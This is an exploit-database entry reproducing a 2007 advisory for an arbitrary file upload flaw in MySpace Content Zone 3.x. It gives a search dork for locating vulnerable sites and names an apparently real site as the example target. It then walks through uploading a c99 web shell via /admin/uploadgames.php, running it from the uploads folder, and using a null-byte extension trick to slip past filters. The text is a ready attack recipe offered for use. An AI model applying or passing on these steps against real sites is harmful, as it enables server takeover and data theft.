Exploit MySpace Content Zone 3.x - Arbitrary File Upload

[Exploiter]

EDB-ID

4741

Проверка EDB

1. Пройдено

Автор

DON

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-6668

Дата публикации

2007-12-18

----------------------------------------------------
[+-MySpace Content Zone RFi-+]
----------------------------------------------------
Found By Don & breaker_unit
----------------------------------------------------


Vuln file: /admin/uploadgames.php
Fix: secure admin area

Dork: "Powered by MySpace Content Zone"


go to /admin/uploadgames.php
example:
http://www.virtualdynamite.com/admin/uploadgames.php
and upload your shell - lets say it is named as c99.php

ok, now go to /uploads/thumb/c99.php
like: http://www.virtualdynamite.com/uploads/flash/c99.php

and - what you see ?? :xD
your shell!

Note1: you can add .php%00.jpeg cause %00 = null
Note2: it takes awhile to upload a shell sometimes!


Creditz to breaker_unit, h4cky0u.org and str0ke!
Don is wishing Happy Holidays to all of you reading this!
Cheers!

# milw0rm.com [2007-12-18]